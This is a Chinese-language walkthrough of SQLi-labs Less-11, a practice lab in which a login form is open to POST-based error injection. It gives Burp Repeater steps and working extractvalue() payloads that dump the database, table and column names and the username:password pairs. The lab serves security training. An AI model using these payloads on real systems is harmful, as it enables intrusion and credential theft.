SQLI DUMB SERIES-11

（1）检测构造方式

由此看出输入的用户名以及密码都被一对单引号所包含。

方法一：

（2） 模拟真实环境，以用户的身份登录。

（3）用burp抓包。开启抓包，输入用户名和密码，会自动跳到这个页面，右键，点击send to repeater.

(4)打开burp的repeater页面，修改post参数，测试是否存在报错注入。

说明存在报错型注入。

（5）可用extractvalue(目标xml文档，搜索路径)进行攻击。

爆库名（库名前用‘~’进行区别）

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

爆user表的列名

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

爆值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

其他用户值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit

（6）测试最后得到的值是否正确

方法二：

　　从（1）中看出可用闭合单引号，若通过其他途径知道了数据库里的一些用户名，即可获得密码。